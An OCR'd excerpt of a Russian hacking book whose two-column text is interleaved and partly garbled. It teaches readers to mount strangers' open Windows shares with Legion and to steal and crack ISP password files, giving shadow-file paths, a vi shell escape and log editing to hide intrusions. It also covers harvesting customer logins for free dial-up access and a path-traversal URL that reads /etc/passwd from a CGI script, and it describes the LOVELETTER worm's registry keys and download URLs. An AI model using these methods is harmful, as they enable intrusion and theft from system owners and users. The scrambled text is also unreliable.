На ping ответило 442 Доступно на запись 91 33%
29%

163 164
Хакинг с самого начала Хакинг с самого начала

Перспективы применения следующим образом: «Что не запрещено,


Во
первых, эта атака (после то разрешено», в отличие от UNIX
систем,
незначительного усовершенствования) где законы несколько другие: «Что не
может быть использована для быстрого разрешено, то запрещено». Стоит
заселения обширных территорий, заметить, что в Windows
подобных
например, BackOrifice или программами системах в стандартной поставке
для проведения DDoS
атак. отсутствует такой сервис, как удаленный
терминальный доступ (telnet) и удаленное
Во
вторых, на этом алгоритме может использование машинного времени не
быть реализован сетевой червь, даже предусмотрено. Многие пользователи,
заниженная оценка скорости работающие в Internet из своих локальных
распространения которого производит сетей открывают доступ к своим дискам,
тяжелое впечатление. например, для товарищей по работе или
каких
либо других целей. Если такая
Как через Internet локальная сеть не защищена Firewall’ом,
то информация этих компьютеров может
подключиться к другой стать доступной из Internet по протоколу
Windows Me машине Netbios
via
TCP/IP. Для подключения
дисков удаленной машины через Internet
Достаточно большое количество достаточно внести IP
адрес и имя машины
машин в Internet находятся под в файл %WinDir%\hosts на вашей машине,
управлением операционных систем затем подключить удаленный диск
Windows 95 или Windows NT. Эти системы воспользовавшись командой «NET USE»
отличаются от UNIX
систем или с помощью меню «Сетевое окружение
дружественным, для простых ➪ Найти компьютер». Обычно все это
пользователей, графическим интерфейсом. работает если между вашей и удаленной
Особенно распространение получила машиной есть устойчивая связь. Время
система Windows 95. Еще одно важное прохождения пакетов можно проверить
отличие этих систем в том, что начальная воспользовавшись программой ping, а
концепция защиты в них формулируется
165 166
Хакинг с самого начала Хакинг с самого начала

доступность портов — установив telnet


чтобы задать диапазон IP прямо в
соединение c 139 портом удаленной программе, и задаем непосредственно Scan
машины. Пару слов о nbtstat. Эта полезная Range/Enter Start IP и Scan Range/Enter
программа, входящая в состав Windows 95 End IP. Например, при установке
и Windows NT, показывающая параметров 10.20.30.1 и 10.20.31.255 у нас
информацию о удаленном компьютере, будут просканированы подсети 10.20.30.x и
например, пользователей, работающих на 10.20.31.x. Кроме этого, для установки
машине. сканируемых IP можно использовать
текстовый файл, что очень удобно при
сканировании одного набора IP.
Описание программы Устанавливаем Connection Speed на нужное
LEGION 2.1 значение и жмем кнопочку Scan.

Программа Legion 2.1, сделанная Программа начинает сканировать


группой Rhino9, является одним из подсеть:
наиболее популярных средств
сканирования удаленных компьютеров на
наличие share
файлов с последующей
возможностью их копирования, стирания
и изменения. Популярность эта программа
получила за счет относительной простоты
настроек и удобств работы, о которых речь
пойдет дальше.
При удачном выборе диапазона IP
Для начала вам нужно знать вы вскоре найдете открытые для доступа
диапазон IP
адресов, которые будут сетевые диски.
сканироваться. Советую брать от x.x.x.1 до
x.x.x.255, иначе при медленной связи В данном случае мы имеем диски A,
ждать придется очень долго. Ставим M и C по адресу 195.239.3.48 и диск
галочку на Scan Type/Scan Range, для того SPEDIA по адресу 195.239.3.64. Для

167 168
Хакинг с самого начала Хакинг с самого начала

получения доступа к ним надо нажать Map и прокси для LAN поддерживают NetBios.
Drive, а после успешного монтирования При подключении через модем убедитесь,
диск появится как сетевой в стандартном что программа верно настроена.
эксплорере Windows.
Legion находит не все хосты в диапазоне IP
Попробуйте поставить более
медленную скорость соединения.
Регулирование скорости определяет время,
отведенное удаленной машине для ответа.
Если удаленный компьютер перегружен
или слишком медленно работает, он
может быть не включен в отчет.
Legion не работает под NT5
Legion не тестировался под NT5, вы
используете его на свой страх и риск.

Распределенные вычисления
Техническая информация. Для
использования программы рекомендуется Различные распределенные
NT4 Server или Workstation, но возможна и технологии получили широкое
работа под Windows 95/98. Минимальная распространение в Internet в силу
конфигурация — Pentium 100, 32 MB распределенной структуры самой Сети. И
RAM, Windows NT4 / Windows98, 28.8 kbps вполне закономерно, что их стали
modem.Возможные проблемы. применять и хакеры. Наверное, самым
невинным использованием таких
Legion не находит цели после NetBios технологий хакерами являются
сканирования
распределенные вычисления.
Если сканирование производится из Общеизвестно, что большую часть
LAN, убедитесь, что конфигурация firewall времени процессор домашнего компьютера
169 170
Хакинг с самого начала Хакинг с самого начала

простаивает, а ведь это время можно При этом пользователь сам по


использовать для выполнения каких
либо собственному желанию устанавливает
трудоемких вычислений. Вообще говоря, клиентское ПО на своем компьютере. Но
вычислительные ресурсы, которые может подобную работу можно организовать без
предоставить один домашний компьютер, собственного программного обеспечения,
невелики, но таких компьютеров в Сети используя лишь возможности обычного
огромное количество, и если удастся браузера, ведь все их последние версии
задействовать даже небольшую часть этих позволяют исполнять на клиентской
машин для работы над машине различные скрипты, средствами
какой
то одной задачей, то совокупная которых зачастую можно реализовать
вычислительная мощность такого необходимый алгоритм. После этого
распределенного компьютера легко компьютер всякого человека, зашедшего
превысит мощность самого большого на сайт, запускающий такие скрипты,
суперкомпьютера на Земле. Такой будет предоставлять свои вычислительные
используется уже давно, и среди примеров ресурсы на работу над некоторой задачей
можно назвать анализ сигналов, все то время, пока пользователь находится
принимаемых радиотелескопом, с целью на этом сайте, причем владелец машины
поиска внеземных цивилизаций или даже не будет об этом подозревать.
проект distributed.net, спонсируемый RSA
Но такой метод не получил
и призванный доказать ненадежность
широкого распространения по целому
алгоритма шифрации RC5 при
ряду причин. Ведь класс алгоритмов,
использовании 64
битных ключей.
которые можно реализовать
Обычно для подобных целей распределенно, очень узок. А для
создается специально клиентское эффективной работы необходимо большое
обеспечение, работающее в фоновом число посетителей, которым располагают
режиме и соединяющееся время от только крупные порталы или
времени с сервером, координирующим корпоративные сайты. Кроме того,
работу, для возврата результатов скрипты в браузере выполняются очень
вычислений и получения нового задания. медленно.

171 172
Хакинг с самого начала Хакинг с самого начала

Но это не единственная адреса или просто игнорировать запросы


распределенная технология, которая может хоста, создающего «шторм», но теперь
быть взята на вооружение хакерами. На такие методы становятся
National Information Systems Security неэффективными. Хакеры научились
Conference эксперты высказали мнение, организовывать «шторм» запросов не с
что за последнее время в Internet одной, а с сотен или тысяч различных
прослеживается четкая тенденция на машин одновременно. Такой подход
увеличение количества атак качественно сильно осложняет задачу администратора,
нового вида. Они названы ведь становится очень трудно выделить
распределенными координированными атакующие хосты среди обычных, так как
атаками (distributed coordinated attack). каждый отдельно взятый атакующий
Новая атака относится к типу атак «отказ компьютер создает траффик, не намного
от обслуживания», отличительной отличающийся от траффика нормального
особенностью которых, позволяющей пользователя. Специалисты прогнозируют
выделить их в отдельный класс, является дальнейший рост атак такого типа, как
их направленность то, чтобы сделать результат увеличения количества
хост
жертву недоступным для других высокоскоростных домашних
объектов сети. Очень часто подобные подключений, и падения среднего уровня
атаки реализуются путем организации квалификации пользователей таких
направленного «шторма» запросов, хотя, соединений. Хакерам будет проще
существуют и другие методы организации находить тысячи плохо защищенных
атак данного типа. При большом числе компьютеров, подключенных через
запросов, «жертва» просто не успевает широкие каналы, чтобы затем
обрабатывать все обращения и, как использовать эти машины как единую
следствие, становиться полностью ударную силу.
недоступной.
Очевидно, что методы, применяемые
До сих пор отражать подобные атаки хакерами, постоянно эволюционируют и
было несложно, ведь достаточно всего усложняются. И нынешняя «новинка» —
лишь ограничить число запросов с одного это отнюдь не высшая из возможных форм

173 174
Хакинг с самого начала Хакинг с самого начала

использования распределенных технологий защищенных системах) пароль


в подобных целях. Около года назад я (UNIX/UNIX; ROOT/ROOT;
присутствовал на защите кандидатской ADMIN/ADMIN; SHELL/SHELL;
диссертации, где были представлены GUEST/GUEST и т.д.). Ha любом UNIXe
некоторые математические оценки (если не используется система
сложности распределенного подбора специальной защиты) файл с паролями
паролей при проникновения в систему с находится в директории etc, в файле
несколькими входами. Тогда мне passwd. Файл, конечно, зашифрован и
показалось, что реализация подобного программы для его обратного
алгоритма вряд ли может быть декодирования просто не существует, но
осуществлена из
за сложности есть другая возможность: кодировать слова
координации работы по взлому паролей с (возможные пароли) и сравнивать
различных машин. Но теперь я уже не получившийся кодированный вариант со
уверен, что через несколько лет не услышу всеми зашифрованными паролями в файле
о воплощении той абстрактной passwd. Хакеры создали программы,
математической модели в жизнь. делающие это автоматически, но для
полноценной работы вам понадобится
довольно быстрый компьютер и хороший
Как узнать пароли для Internet: словарь с возможными паролями. Ha моей
Взлом провайдера памяти самый полный словарь занимал 10
мегабайт дискового пространства и помог
Эта глава может оказаться полезной вскрыть более 200 паролей пользователей
только в том случае, если ваш провайдер известного российского провайдера. Из
использует операционную систему UNIX, всего, что я встречал, самая лучшая
имеющую программа для дешифрации пароля под
shell
доступ. UNIX была Crack Алека Муфетта, а под
Если у вас нет UNIX
shell’a в сервер DOS — CrackerJack.
провайдера, вы можете официально купить Некоторые провайдеры используют
его или подобрать (только на слабо систему скрытия паролей, в этом случае

175 176
Хакинг с самого начала Хакинг с самого начала

вместо шифрованного пароля можно будет ■ <optional NIS+ private secure


увидеть что
то наподобие *, а настоящие maps/tables/whatever>
шифрованные пароли находятся в другом
■ /etc/shadow
месте. Если вы имеете дело с таким
провайдером, не расстраивайтесь, у вас все ■ /etc/security/* database
равно есть шанс стать обладателем ■ /etc/auth[.dir|.pag]
десяточка паролей пользователей. Для
начала попробуйте поискать спрятанный ■ /etc/udb
файл с паролями в следующих местах: Ho может быть и так, что нужного
■ /etc/security/passwd результата от поиска в этих директориях
вы не добьетесь. Тогда вам придется
■ /tcb/auth/files/
воспользоваться специально написанной
■ <first letter of программой для отлова файла с паролями.
username>/<username> Эта программа работает на многих
системах (хотя не на всех) и называется
■ /tcb/files/auth/?/
getpwent(), ее исходник можно найти на
■ /etc/master.passwd сеpвеpе (www.spider.ru) в pубpике
«ХАКЕРЫ». Еще одна возможная
■ /etc/shadpw
непpиятность, связанная с дешифрацией
■ /etc/shadow файла с паролями может случится тогда,
■ когда вы откроете файл passwd и увидите
/etc/tcb/aa/user/
там что
то похожее на: +::0:0:::. Это
■ /.secure/etc/passwd говорит о том, что в системе использована
■ /etc/passwd[.dir|.pag] система NIS (Network Information
Server)/YP (Yelow Pages). Если у вас
■ /etc/security/passwd.adjunct возникла такая проблема, то вам будет
■ ##username необходимо воспользоваться командой
«ypcat passwd» для просмотра настоящего
■ /etc/shadow файла с паролями. Если вам придется

177 178
Хакинг с самого начала Хакинг с самого начала

доставать файл с паролями под VMS, то Добывание паролей Internet у


попробуйте посмотреть
SYS$SYSTEM:SYSUAF.DAT. Для взлома провайдера с помощью
паролей под VMS вам надо программ
воспользоваться программой
CHECK_PASSWORD или Некоторые корпоративные
GUESS_PASSWORD, а если у вас есть пользователи (в основном это
навыки программирования, то вам будет предприятия) имеют неограниченный
не сложно написать программу, которая доступ в Internet по коммутируемым
будет сравнивать кодированные слова из линиям за абонентскую плату в месяц, но
вашего словаря с паролями из файла. ведь они работают только днем, а ночью
время пропадает зря. Чтобы
Иногда для взлома провайдера воспользоваться доступом в Internet вместо
требуется взломать ограниченный shell
такого пользователя необходимо узнать
доступ. Для этого вам следует запустить логин и пароль, под которым он входит в
программу vi и использовать эту команду: Internet у своего провайдера. Узнать
set shell=/bin/sh, после чего shell логины этих пользователей очень легко.
использует следующую команду :shell. И Зайдите на сайт провайдера и посмотрите
так, если вам удалось выудить несколько странички клиентов. Имя под каталога,
паролей пользователей из passwd, то вам откуда стартует страничка, обычно
следует «замести следы». Это делается совпадает с логином. Еще один способ —
довольно просто, вам надо будет это узнать адрес электронной почты
отредактировать файлы /etc/utmp, такого клиента. Первая часть адреса т.е.
/usr/adm/wtmp, /usr/adm/lastlog. Правда которая идет до @ обычно и является
эти файлы написаны не открытым текстом логином. Только смотрите, чтобы после @
и руками при помощи vi отредактировать шло имя провайдера, а не так:
вам его не получится, придется user@mail.ru. Найденные вами логины
воспользоваться специальной программой. сохраните в каком
нибудь текстовом
файле в столбик (этот файл еще
пригодится, а назвать его, чтобы не
179 180
Хакинг с самого начала Хакинг с самого начала

запутаться, можно так: анонимен. Точнее, он абсолютно


name_prov_login.txt). анонимен, но если спецслужбы потребуют
от проки
сервера твой реальный IP, то он
Следующий шаг — это создание
обязательно расскажет им все. А
текстового файла паролей, которые будет
transparent proxy server вообще ничего не
перебирать программа взлома. Для этого
скрывает. Проверить, насколько анонимен
нужно знать, как провайдер присваивает
твой прокси можно очень много где.
пароли (по своему опыту знаю, что
Пишешь сообщение, но не пишешь e
mail.
некоторые провайдеры предоставляют
Потом вместо твоего e
mail’а там появится
право выбора тебе, другие генерируют
твой IP
адрес. Если он действительно —
программно, например, из одних цифр
твой, то пора менять proxy
server. Если не
или по маске). С программой генератором
твой, то можно пользоваться спокойно.
паролей ничем не могу помочь. Сам
Можно проверить свой IP на Kiss.Ru. Там,
нашел программу passlist.zip (*.zip значит
когда признаешься всему миру в любви к
заархивированная) на http://www.astalavista.
маме и папе, они предупреждают, чтобы
box.sk/, но разобраться с ней не смог,
ты не хулиганил, потому что они знают
подвешивает она у меня компьютер,
твой IP. Можно написать страничку
наверное мои познания в английском
примерно со следующим кодом:
слишком слабы. В общем, создаете файл
паролей, обзываете его, например, <html>
name_prov_pass.txt, и переходите <head>
непосредственно к работе с программой, <title>Мой IP</title>
которую выберите. </head>
<body>
<form name=f1>
Как проверить анонимность <input type=hidden name=ip value="<!
proxy.server’а echo var="REMOTE_ADDR">">
</form>
Если ты используешь no transparent <script language="JavaScript"><!
proxy
server, то он практически полностью var ip=document.f1.ip.value;

181 182
Хакинг с самого начала Хакинг с самого начала

document.write(ip); на порт login. Там она сразу на монику


//></script> выведется. А если такого открытого порта
</body> не имеется, или ты подозреваешь, что
</html> админ совершил подмену, то зателнеться
Закачав этот файл на какой
нибудь по разным портам и посмотри, что там
сервер, а потом открыв его, можно увидеть висит. По версии демона установить ОС
твой IP. Только сервер должен не составляет труда. Например, если ты
поддерживать CGI. Если нет возможности видишь FTPd, то скорее всего это Юникс.
закачивать, то можно послать такой код в А вообще в Юниксовских демонах очень
какую
нибудь ГК, или вставить в чат. часто пишут полную версию ОС. Дальше
Только такой код мало где пропустят. идешь на кул
хацкерские сайты, такие как
Если подменить в этом коде ADDR на HACK
CRACK, HACKZONE или HOLM
HOST, то можно будет увидеть твой хост и ищешь эксплоит для этого демона. В
или адрес прокси
сервера, если он no основном все эксплоиты либо проводят
transparent. DoS
атаку (это когда сервер перестает
отвечать), либо дают там тебе shell. Тебе
предпочтительней второе. Особенно если
Как хакнуть WWW.сервер это root
shell.
Есть несколько способов. Второй способ заключается в поиске
Первый, и самый простой, это дырок в CGI. Чтобы самому научиться
просто внимательно читать в рассылке искать дырки в CGI, тебе необходимо
раздел NEWBUG’S и смотреть на сервере, знать язык на котором написан скрипт
который надо хакнуть, нет ли у него такой (Perl, PHP, CGI). Хороший источник
дыры. Но это гиблое дело. Лучше всего документов по CGI
технологиям и не
просканить порты на сервере, посмотреть только — это сервер CitForum. Или можно
версию операционной системы и версии «взломать» сервер, найдя мелкие тупости
демонов. Версию операционной системы ихнего сисадмина. На одном сервере (не
можно проверить, просто зателнетившись будем показывать пальцем) был CGI

скрипт, который выводил статистику

183 184
Хакинг с самого начала Хакинг с самого начала

соединений на принтер сервера. И доступ файлы. Допустим это адрес 195.34.32.10.


к нему был без пароля и без вообще чего
Потом пишем в адресной строке браузера
либо! Скрипт называется printstat.cgi. http://195.34.32.10/cgi

Синтаксис у него вида: bin/webplus?scripts=/../../../../etc/passwd. И


printstat.cgi?action=print&con=con&con все! У тебя файл паролей того сервера.
2=lpt1&id=csu Осталось его только расшифровать. Я
использую John the Ripper. Это, на мой
Эта строка напечатала бы на
взгляд, лучший дешифровщик. К тому же
принтере сервера статистику всех
может работать по нескольким
соединений по аккаунту «CSU». То есть,
алгоритмам.
подменяя значения con2 можно было
перенаправлять вывод на разные
устройства, к которым можно было Подробности про вирус
обратиться как через порт, так и по имени VBS.LOVELETTER
(например, вместо lpt1, print. То есть
использовать такие имена как display и Другое название этого вируса «I
т.д.). Если тебе насрать, что ломать, то LOVE YOU». Это вирус
червь, который
воспользуйся программой GRINDER. Их распространяется через электронную почту
есть две. Одна для виндов — это мэйл
(круче всего заражаются Outlook и Lotus
бомбер, причем преотвратный, а вторая — Notes). Вирус присылается юзеру в письме
для UNIX. Вот вторая тебе и нужна. Она с сабжем «ILOVEYOU», телом «kindly
сканит диапазон IP на содержание по ним check the attached LOVELETTER coming
определенных файлов. Тебе надо всего
from me». Так же к письму
навсего ввести имя дырявого скрипта, а проаттачивается файл LOVE

когда он найдет такой сервер, просто LETTER


FOR
YOU.TXT.vbs. При его
поюзать дырку. Например, ставишь запуске он создает в c:\windows файл
сканирование в диапазоне от 1.1.1.1 до Win32DLL.vbs и прописывает его запуск в
255.255.255.255 на содержание файла /cgi
реестре по адресу
bin/webplus.cgi. Он тебе выведет список HKEY_LOCAL_MACHINE\Software\Micro
IP
адресов, на которых имеются такие soft\CurrentVersion\
185 186
Хакинг с самого начала Хакинг с самого начала

RunServices\Win32DLL. А в папке ■
c:\windows\system он создает файлы http://www.skyinet.net/~angelcat
MSKernel32.vbs и LOVE
LETTER
FOR
/skladjflfdjghKJnwetry
YOU.TXT.vbs. DGFikjUIyqwerWe546786324hjk
4jnHHGbvbmKLJKjhkqj4w/
Запуск MSKernel32.vbs он
WIN
BUGSFIX.exe
прописывает в реестре по адресу
HKEY_LOCAL_MASCHINE\Software\Micr ■
osoft\CurrentVersion\ http://www.skyinet.net/~koichi/jf
RunServices\MSKernel32. 6TRjkcbGRpGqaq198vbFV
5hfFEkbopBdQZnmPOhfgER67b
Следующим его шагом является
3Vbvg/WIN
BUGSFIX.exe
рассылка самого себя всем адресатам
адресной книги. Файл, который надо ■
приаттачить он берет из http://www.skyinet.net/~chu/sdgf
c:\windows\system\LOVE
LETTER
FOR
hjksdfjklNBmnfgkKL
YOU.TXT.vbs. Сам файл не запускается, HjkqwtuHJBhAFSDGjkhYUgqwe
его прикладывают. Далее вирус ищет файл rasdjhPhjasfdglkNBhbqwebmznxc
WINFAT32.EXE и если такой имеется, он bvnmadshfgqw237461234iuy7thjg/
скачивает из Internet файл WIN
BUGSFIX.exe
WIN
BUGSFIX.EXE. Скачивается он с
Запуск прописывается в реестре по
четырех адресов в сети, которые уже
адресу
уничтожены доблестными хранителями
HKEY_LOCAL_MACHINE\Software\Micro
порядка:
soft\Windows\CurrentVersion\Run\WIN

■ BUGSFIX. Стартовой страничкой


http://www.skyinet.net/~young1s/ эксплорера становится about:blank (пустая
HJKhjnwerhjkxcvytwertn страничка). После скачивания, файл
MTFwetrdsfmhPnjw6587345gvsdf запускается. Этим действом он дрючит
7679njbvYT/WIN
BUGSFIX.exe твою файловую систему (если она FAT32).
Заключается это в том, что ты не сможешь

187 188
Хакинг с самого начала Хакинг с самого начала

уйти дальше корневого каталога, не преобразовываться из одного вируса в


сможешь производить запись на диск и другой. Причем абсолютно новый.
другие глюки. Но виндам эти действия Происходит это в том случае, если работа
доступны. Файл WIN
BUGSFIX.EXE вируса по каким
либо причинам не
добавляет какую
то там фишку в винды, доведена до конца. Причем, что получится
чтобы они могли делать эти действа при в следующий раз — не знает никто. Новые
загрузке. Далее он опять сканирует хард на версии рассылаются с сабжем «Very
наличие файлов .jpg, .jpeg, .js, .vbs, .css, funny», «Joke» или «Mothers Day Order
.vbe, .jse, .hta, .sct, .whs, вытирает их и Confirmation» (этот прикладывает файл
записывает на их место свою копию. mothersday.vbs). Хотя версий на самом деле
Далее ищутся файлы mp2 и mp3. На них намного больше. Просто эти получили
он ставит атрибут hidden и создает свою наибольшее распространение. Отличаются
копию с таким же именем, но они тем, что разрушают другие типы
расширением vbs. Допустим, если файл файлов. Например, перечисленные мной,
был queen_tsmgo.mp3, то имя его копии вместо файлов .jpg поганят файлы .INI и
будет queen_tsmgo.mp3.vbs. Дальше он .BAT. Отличительная особенность —
создает в c:\windows\system файл LOVE
каждая новая версия перестает разрушать
LETTER
FOR
YOU.HTM, при открытии какой
либо один тип файлов, но начинает
которого загружается MSKernel32.vbs. разрушать два других типа файлов.
Причем более нужных.
Последний этап работы вируса —
создание в папке mIRC’а файла Обнаружить вирус можно, найдя
SCRIPTS.INI (файл для задания файлы или ключи в реестре, которые я
последовательности действий при только что описывал. Можно поставить в
различных событиях в программе. Ну а любом мониторинге траффика чтобы он
если mIRC’а нет, то и не надо. Он ничего не пропускал соединения с Context «kindly
не запишет). После этого, при заходе на check the attached LOVELETTER coming
канал IRC, всем посетителям будет from me». Пообщаться с хакером можно
разослана его копия. Но вирус этот — не по e
mail’у spyder@super.net.ph или
простой, а золотой. Он может mailme@super.net.ph. Я с ним связался и

189 190
Хакинг с самого начала Хакинг с самого начала

вот мои впечатления о нем: ни хрена он Уроки по VBScript


не хакер! Он просто недалекий человек, на
которого все подумали. А нашло его FBI Так как мы будем постоянно
по такому случаю. Всюду в вире (в пользоваться формами, я сделаю
комментариях, в заголовках, совсем везде) небольшое введение в формы, какие там
встречается фраза «I hate go to school». тэги существуют и для чего. Итак, все
Точно так же подписывается и этот содержимое формы лежит между тэгами
sPYDER (от слова ПИДОР) во всех его <form> и </form>. Форме можно задать
письмах. Кстати, владелец e
mail’а имя (атрибут NAME). Когда мы
ispyder@mail.ru — не отвечает. Только я программируем на VBScript, это
заметил одно НО: он подписывается «I необходимо, т. к. в некоторых ситуациях
hate going to the school», а в вире написано обращение к форме по ее индексу
«I hate go to school». Хотя он и говорит, невозможно.
что вирус написал он. Но удовольствия от
Следующий атрибут: ENCTYPE —
общения с ним ты не получишь: через
тип кодировки. Объяснять это я не буду,
слово приколы человека, который, по
т.к. в бейсике с этим не работают, скажу
всему видно, имеет три класса
только, что если ты хочешь, что бы была
образования (постоянно опечатки, тупые
отправка на e
mail, то тебе нужен будет
детские приколы да вопросы типа: «У
атрибут:
меня винда накрылась, давай по
терминалке сконнектимся?»). К тому же ENCTYPE="text\plain"
любитель ненормативной лексики. Ну вот Атрибут ACTION содержит место
и все. Осталось только отметить назначения отправки формы. Это может
системные требования: Win98/2k. На быть как e
mail, так и CGI
скрипт. Если
Win95 будет глючить. На NT не проверял. это e
mail, то адрес должен быть вида
Подробности расписывать не буду. mailto:heller@mail.ru. Можно на конце
поставить:
?Subject="xxx"

191 192
Хакинг с самого начала Хакинг с самого начала

XXX — это Тема письма. Вообще type=button, submit, reset, text — это их
таких элементов много (например, copy, надпись или начальное значение), checked
from и т. д. Можно придумать свои — стоит ли флажок/включена ли
элементы, тогда они тоже будут видны про радиокнопка. Вот и все про формы, что я
просмотре информации о письме). хотел рассказать. Осталось только
отметить, что если у вас получаются
Последний параметр, который нам
вложенные кавычки (например:
пригодится — METHOD. Значений бывает
два (на самом деле их три, но третье почти action="mailto:heller@mail.ru?Subject=
никакой браузер не поддерживает): POST "CSU"")
и GET. POST — это когда отсылается то надо использовать разные кавычки
напрямую серверу, а GET — это когда (одинарные и двойные), а то получается,
названия форм и их значения просто что значение параметра закрывается
добавляются в конце адреса. Например, раньше времени, а дальше идет новый
если в форме прописано параметр.
ACTION=http://csu.ru/cgibin/xxx.cgi, и
Теперь о VBScript. Давайте
ка
если имеется два параметра: uname=heller
напишем примитивную программу, чтобы
passwd=xxxxxxxx, то браузер пройдет по
из верхнего поля текст копировался в
адресу http://csu.ru/cgi
нижнее. Вначале напишем поле формы:
bin/xxx.cgi?umane=heller&passwd=xxxxxxxx.
<html>
Теперь про вложенные тэги. Я <head> <! В тэге HEAD помещаются
расскажу только про один: <INPUT>. Его тэги, содержащие информацию о
параметры: type (тип INPUT’а. Например, документе, но не влияющие на
button — кнопка, reset — кнопка очистки отображение на экране >
формы, submit — кнопка отправки формы, <title>НАШ ПЕРВЫЙ VBSCRIPT</title>
text — текстовое поле, radio — <! Заголовок окна >
радиокнопка (такой круглый </head>
переключатель) и checkbox — флажок), <body>
name — имя, value — значение (для <form name=f1>

193 194
Хакинг с самого начала Хакинг с самого начала

<input type=text name=t1><br><br> Так мы создали переменную с. В


<input type=text name=t2><br> конце строчки ничего не ставится. Теперь
<input type=button name=b1 нам надо написать событие PLAY.
onclick=play() value="Копировать"> Делается это с помощью оператора sub
</form> PLAY вначале и end sub в конце.
</body> Прописные/строчные буквы не
</html> различаются. Первым делом заносим в
Итак, вот наш скрипт. У кнопочки переменную c значение из первого поля.
мы видим атрибут ONCLICK=PLAY(). Это Делается это следующим образом:
значит, что при нажатии на эту кнопку, c=document.f1.t1.value
будет выполнятся событие PLAY. Скобки Я думаю, тут все понятно. Теперь
нужны для JavaScript. VBScript их не заносим во второе поле переменную таким
использует, но они необходимы как же образом:
элемент HTML. VBScript вставляется в
HTML
документ тэгами document.f1.t2.value=c
Все! Код должен получится
<script language="VBScript"><! 
следующий:
></script>
Тэги комментариев не нужны. Их <html>
используют для того, чтобы если браузер <head> <! В тэге HEAD помещаются
не поддерживает тэг Script, он принимал тэги, содержащие информацию о
код за комментарий и не показывал его. документе, но не влияющие на
отображение на экране >
Вначале нам надо создать <title>НАШ ПЕРВЫЙ VBSCRIPT</title>
переменную, в которую мы запишем <! Заголовок окна >
значение верхнего поля (элементы HTML </head>
в VBScript не могут взаимодействовать <body>
напрямую, как в JavaScript). Делается это <form name=f1>
оператором <input type=text name=t1><br><br>
dim c <input type=text name=t2><br>

195 196
Хакинг с самого начала Хакинг с самого начала

<input type=button name=b1 value=Enter onclick=play()>


onclick=play() value="Копировать"> </form>
</form> </center>
<script language="VBScript"><! </body>
dim c </html>
sub play Теперь нам надо создать переменные
c=document.f1.t1.value v (вариант пользователя — dim v), q
document.f1.t1.value=c (загаданное число — dim q) и p
end sub (количество сделанных ходов). Так как q у
></script> нас будет случайным числом, нам надо
</body> включить генератор случайных чисел
</html> (randomize). Генерить число мы будем с
Теперь напишем что
нибудь помощью оператора rnd. Для этого
посложнее. Я предлагаю написать что
то напишем такое q=int(rnd(1)*100+1). Тут я
типа для угадывания цифры. Вначале думаю все понятно. Int — преобразовать
давай создадим HTML
файл. Вот его код: число в тип интеджер (в переменных
<html> int(eger) хранятся целые числа). rnd —
<head> сгенерировать случайное число. Оно
<title>1 из 100</title> генерирует случайное число вида 0.qwerty.
</head> Поэтому нам надо его умножить на 100
<body> для того, чтобы увеличить его значение.
<center> Вот только оно будет максимальным 99, а
<form name=f1> минимальным 0, поэтому мы прибавляем
<input type=button name=b1 еще один. Вот как у нас будет выглядеть
value="Загадать число" событие start:
onclick=start()><br><br> sub start
Введите число:<br> q=int(rnd(1)*100+1)
<input type=text name=t1> p=0 'обнуляем количество попыток
<input tyep=button name=b2 alert "Загадано число от 1 до 100"

197 198
Хакинг с самого начала Хакинг с самого начала

'выводим сообщение типа "alert" Начнем v=cInt(v). Дело в том, что


end sub тип int подразделяется еще на кучу типов.
Alert — это функция, которая Этого я сейчас объяснять не буду.
выводит на экран окошко с указанным в Свойства и действа, которые можно
кавычках сообщением и кнопкой OK. Тут сделать с ними одинаковы, разница в том,
как вы видите, мы применили не способ как они хранятся в памяти. В обычном
b1_onclick, создали новое событие start. VisualBasic они не могут
Сделано это потому что функция alert в взаимодействовать с друг с другом, а в
VBScript не работает в событиях, которые VBScript спокойно. В общем, cInt’ом я
вызываются не по имени, а в которых преобразовал стринговое значение v
действие описывается на уровне скрипта. (стринг — это тип переменной, которая
Это маразм, но ничего тут не поделать. хранит текстовую строку) на int. Дальше я
Теперь опишем событие play. Вот его код: использовал условия if. Синтаксис такой:
sub play if условие then
p=p+1 'прибавляем один ход код
v=document.f1.t1.value 'задаем else
переменной v значение, которое мы код
ввели в текстовом поле t1 end if
v=cInt(v) Я узнавал больше переменная или
if q<v then меньше и выводил соответствующее
alert "Загаданное число меньше" сообщение (alert). document.write — это
end if создание новой странички с содержимым,
if q>v then которое указано в скобках. & в VBScript
alert "Загаданное число больше" ассоциируется как «и». Только такое
if q=v then может пройти только в alert’ах и других
document.write ("Вы победили за подобных функциях. В остальных случаях
"&p&" ходов") (тот же if) надо заменить & на AND, иначе
end if код не заработает. Вот и все. Код написан.
end sub Вот как он выглядит полностью:

199 200
Хакинг с самого начала Хакинг с самого начала

<html> v=cInt(v)
<head> if q<v then
<title>1 из 100</title> alert "Загаданное число меньше"
</head> end if
<body> if q>v then
<center> alert "Загаданное число больше"
<form name=f1> if q=v then
<input type=button name=b1 document.write ("Вы победили за
value="Загадать число" "&p&" ходов")
onclick=start()><br><br> end if
Введите число:<br> end sub
<input type=text name=t1> ></script>
<input tyep=button name=b2 </body>
value=Enter onclick=play()> </html>
</form>
</center> Программы, которые изменили
<script language="VBScript"><!
dim q мир
dim v
Хочу начать с такого понятия, как
dim p
«тотальная мода». К хаку это имеет
randomize
немалое отношение. Во
первых, взлом
sub start
делается чаще всего ради собственного
q=int(rnd(1)*100+1)
удовольствия. И если «хакер» услышал о
p=0
методе взлома (не очень сложном), то не
alert "Загадано число от 1 до 100"
грех воспользоваться этим методом и
end sub
повысить свою квалификацию. Даже если
sub play
этот метод существовал давно, но хакер в
p=p+1
силу не профессионального (в значении
v=document.f1.t1.value
специальности) увлечения взломом просто

201 202
Хакинг с самого начала Хакинг с самого начала

не знал об этом виде взлома. Зачастую популярной. К тому же в одном из


облегчить понимание метода взлома номеров журнала «Хакер» можно было
помогает программа для этого написанная. увидеть очень подробную статью об этой
Эти программы легки в использовании, к программе. Затем посыпались
тому же инструкции прилагаются, нужно бесконечные вопросы на форумах, типа
лишь терпение. Это создаёт «тенденцию», «где достать
повальную моду на данный вид взлома. Legion 2.1»? Сотни людей ломанулись
Во
вторых, нередко происходят подключаться к ресурсам своих соседей.
обнаружения новых дыр и даже новых Только вот некоторые обломались, не
«видов» дыр. Как известно это становится знав, что нужны определённые настройки
быстро достоянием общественности и Net BIOS’a и прочей фигни, если хочешь
любой, кто захочет постарается применить всё это делать, но почти у всех они были
новый вид атаки. Иногда методы взлома по умолчанию. Короче, появилась мощная
подробно описывают на популярных тенденция sharing’a. Эту тенденцию
сайтах и журналах. Есть ещё куча условий продолжила программа EssentialNetTools,
